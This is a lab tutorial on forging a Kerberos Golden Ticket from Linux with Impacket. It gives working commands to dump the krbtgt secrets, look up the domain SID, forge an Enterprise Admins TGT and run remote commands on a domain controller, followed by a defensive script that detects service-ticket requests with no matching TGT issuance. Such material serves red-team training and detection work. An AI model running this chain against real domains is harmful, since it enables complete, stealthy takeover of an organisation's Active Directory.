Golden Ticket Attack: Exploiting Kerberos from Linux

Introduction

Golden Ticket attacks enable complete and stealthy control over Active Directory (AD) domains by abusing Kerberos authentication. While traditionally executed from Windows, robust open-source Linux tooling—especially Impacket—makes this attack highly accessible on Unix-like systems. This guide details each critical phase, from hash extraction to ticket abuse, using field-tested commands for maximum reliability.

What is a Golden Ticket Attack?

A Golden Ticket attack is a Kerberos abuse in which attackers forge Ticket Granting Tickets (TGTs) using the secret of the AD Kerberos Ticket Granting Service account (krbtgt): its NTLM hash or, as in this guide, its AES key. Because the domain controller trusts any TGT encrypted with that secret, the forged ticket grants attackers unfettered, persistent access to any AD resource and sidesteps controls that rely on the normal TGT issuance path.

  • Prerequisites:
    • Domain admin-level access (krbtgt hash required)
    • Reachable target AD controller
    • Linux host with Impacket installed

Conditions

  • Lab domain: lab.local
  • DC: dc01 / 192.168.198.10
  • Lab network: 192.168.198.0/24

Extracting Credentials and Domain SID

Start by dumping necessary hashes and discovering the domain SID.

Dumping Hashes with impacket-secretsdump

The krbtgt secret is what makes a forged TGT indistinguishable from a genuine one. Use secretsdump to extract it:

impacket-secretsdump lab.local/administrator@lab.local > secretsdump

Find the krbtgt line in the output and copy the NTLM hash (the fourth colon-separated field of the krbtgt:502:... line). secretsdump also prints the account's Kerberos keys under "Kerberos keys grabbed"; the krbtgt:aes256-cts-hmac-sha1-96 value is the key later passed to ticketer with -aesKey.

Retrieving the Domain SID

Kerberos tickets require the correct domain Security Identifier (SID). Obtain it using lookupsid:

impacket-lookupsid 'administrator:Pa$$w0rd!'@lab.local > lookupSid

Copy the domain SID string (e.g., S-1-5-21-3129320692-2127993854-1865768362) from the output.

Forging the Golden Ticket

With the krbtgt hash and the domain SID, generate the forged ticket using impacket-ticketer.

impacket-ticketer \
  -domain lab.local \
  -domain-sid S-1-5-21-3129320692-2127993854-1865768362 \
  -extra-sid S-1-5-21-3129320692-2127993854-1865768362-519 \
  -dc-ip 192.168.198.10 \
  -user Administrator \
  -password 'Pa$$w0rd!' \
  -aesKey fe1092735e93831448b0b917c94a76d9b713734f030aac3babe86775e591eace \
  Administrator

Here, the values mean the following:

  Value                                                              Details
  S-1-5-21-3129320692-2127993854-1865768362                          Domain SID
  S-1-5-21-3129320692-2127993854-1865768362-519                      Enterprise Admins group (RID 519), added to the ticket as an extra SID
  192.168.198.10                                                     Domain Controller IP
  fe1092735e93831448b0b917c94a76d9b713734f030aac3babe86775e591eace   AES-256 key of the krbtgt account

This command forges a Kerberos TGT for the Administrator user with full domain privileges (the extra SID adds Enterprise Admins membership) and writes it to Administrator.ccache in the current directory. Adjust the AES key, SIDs and DC address to match your recon.

Using the Golden Ticket

To leverage this forged ticket, set the Kerberos cache environment variable and execute remote commands:

KRB5CCNAME=Administrator.ccache python3 /usr/share/doc/python3-impacket/examples/wmiexec.py -no-pass -k lab.local/administrator@dc01.lab.local

Always use the domain controller's exact DNS hostname as registered in AD (e.g., dc01.lab.local). A name that does not match the registered service principal, or an IP address, typically fails Kerberos authentication because the service ticket is issued for a specific SPN.

Conclusion

Golden Ticket attacks remain one of the most powerful tools for AD exploitation—privilege, persistence, and stealth in a single operation. With high-fidelity Linux tooling like Impacket, red teamers and attackers can perform the entire attack chain from non-Windows systems. Defenders must monitor for Kerberos anomalies, audit krbtgt hash changes, and ensure rapid detection of unauthorized TGT issuance.
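As an added illustration of the correlation defenders can run (not part of the original post or of Impacket): a forged TGT is handed straight to the ticket-granting service, so the DC records 4769 service-ticket requests for the account without any preceding successful 4768 TGT issuance. The script below checks constructed, simplified event lines for exactly that gap; the line format, timestamps, client addresses and the 7-day window are assumptions.

```python
from datetime import datetime, timedelta

# Constructed, simplified event lines (not real DC output): timestamp, logging
# DC, then key=value fields taken from Windows events 4768 (TGT request) and
# 4769 (service ticket request). A 4768 with result 0x18 is a failed pre-auth.
EVENTS_LOG = """\
2024-05-01T07:55:02Z dc01 id=4768 account=Administrator client=192.168.198.77 result=0x18
2024-05-01T08:02:11Z dc01 id=4768 account=jsmith client=192.168.198.54 result=0x0
2024-05-01T08:02:13Z dc01 id=4769 account=jsmith@LAB.LOCAL service=cifs/fs01.lab.local client=192.168.198.54 result=0x0
2024-05-01T09:15:40Z dc01 id=4769 account=Administrator@LAB.LOCAL service=host/dc01.lab.local client=192.168.198.77 result=0x0
2024-05-01T09:15:41Z dc01 id=4769 account=Administrator@LAB.LOCAL service=krbtgt/LAB.LOCAL client=192.168.198.77 result=0x0
"""


def parse_events(text):
    """Turn the key=value lines into dicts with a parsed UTC timestamp."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        stamp, dc, *fields = line.split()
        event = {"time": datetime.strptime(stamp, "%Y-%m-%dT%H:%M:%SZ"), "dc": dc}
        for field in fields:
            key, value = field.split("=", 1)
            event[key] = value
        events.append(event)
    return events


def find_tgs_without_tgt(events, window=timedelta(days=7)):
    """Return successful 4769 events whose account got no successful 4768 from
    any DC within `window` beforehand. A forged TGT is handed straight to the
    TGS, so the AS exchange that produces 4768 never happens. The window is
    the AD default TGT renewal lifetime (7 days); feed logs from every DC, as
    the TGT may legitimately have been issued by another one."""
    issued = [e for e in events if e["id"] == "4768" and e["result"] == "0x0"]
    suspicious = []
    for e in events:
        if e["id"] != "4769" or e["result"] != "0x0":
            continue
        user = e["account"].split("@", 1)[0].lower()  # 4769 logs user@REALM
        covered = any(t["account"].lower() == user
                      and e["time"] - window <= t["time"] <= e["time"]
                      for t in issued)
        if not covered:
            suspicious.append(e)
    return suspicious
```

Run against the sample, the two Administrator service-ticket requests are flagged (the only 4768 for that account failed pre-authentication), while jsmith's request is covered by a TGT issued two seconds earlier.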

Mastering this workflow is indispensable for anyone assessing Active Directory environments or building modern blue-team detection capabilities.
